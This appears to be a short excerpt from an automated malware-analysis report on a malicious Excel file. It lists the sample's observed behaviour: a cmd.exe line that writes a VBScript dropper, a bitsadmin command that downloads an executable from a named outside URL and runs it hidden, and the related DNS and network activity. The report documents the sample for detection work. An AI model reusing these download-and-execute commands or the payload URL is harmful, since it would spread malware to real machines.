Technical Information
- '<SYSTEM32>\cmd.exe' /c @echo Set objShell = CreateObject("Wscript.Shell") > Df.vbs & @echo objShell.Run "cmd /c bitsadmin /transfer 8 /download http://akdental.ro/TE0965345678900099.exe %temp%\Df.vbs&%temp%\Df.vbs...
- %HOMEPATH%\documents\df.vbs
- <Current directory>\ef041000
- <PATH_SAMPLE>.xls
- 'ak##ntal.ro':80
- DNS ASK ak##ntal.ro
- '<SYSTEM32>\wscript.exe' "%HOMEPATH%\Documents\Df.vbs"
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer 8 /download http://akdental.ro/TE0965345678900099.exe %TEMP%\Df.vbs&%TEMP%\Df.vbs' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer 8 /download http://akdental.ro/TE0965345678900099.exe %TEMP%\Df.vbs&%TEMP%\Df.vbs
- '<SYSTEM32>\bitsadmin.exe' /transfer 8 /download http://akdental.ro/TE0965345678900099.exe %TEMP%\Df.vbs